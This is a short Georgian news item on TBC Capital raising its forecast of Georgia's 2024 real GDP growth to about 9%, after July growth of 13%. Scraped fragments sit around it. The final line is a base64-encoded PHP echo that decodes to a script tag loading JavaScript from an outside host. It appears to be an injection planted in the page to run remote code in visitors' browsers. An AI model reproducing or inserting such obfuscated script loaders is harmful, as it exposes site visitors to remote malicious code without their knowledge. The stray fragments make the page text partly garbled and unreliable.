celsiusi
ავერსი საქკაბელი

 "თიბისი კაპიტალმა" საქართველოს ეკონომიკური ზრდის პროგნოზი გააუმჯობესა. მთავარი ეკონომისტის ყოველკვირეული განახლების თანახმად, 2024 წლის რეალური ეკონომიკური ზრდა დაახლოებით 9%-ით განისაზღვრება.

აღსანიშნავია, რომ განახლებული პროგნოზი 1.6 პროცენტული პუნქტით აღემატება "თიბისი კაპიტალის" აქამდე არსებულ 7.4%-იან პროგნოზს.

ანგარიშში აღნიშნულია, რომ უფრო დეტალური შეფასებები მას შემდეგ იქნება, რაც თვის ბოლოს, ეროვნული ანგარიშებისა და საგადასახდელო ბალანსის მონაცემები გამოქვეყნდება.

"თიბისი კაპიტალი" მიუთითებს, რომ წინასწარი შეფასებით ივლისში დაფიქსირებული ეკონომიკის 13%-იანი ზრდა, იმაზე ძლიერი იყო ვიდრე მათი ინდიკატორები მიუთითებდა. ამასთან, "თიბისის" არხებით განხორციელებული ტრანსაქციების ანალიტიკა აგვისტოშიც სავალუტო შემოდინებებისა და ზოგადად ეკონომიკური აქტივობის მაღალ დონეზე მიუთითებს.

2024 წლის ივლისში, წინა წლის შესაბამის პერიოდთან შედარებით, რეალური მთლიანი შიდა პროდუქტის (მშპ) ზრდამ 13% შეადგინა, ხოლო 2024 წლის პირველი შვიდი თვის საშუალო მაჩვენებელი 9.7%-ით განისაზღვრა.

100
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");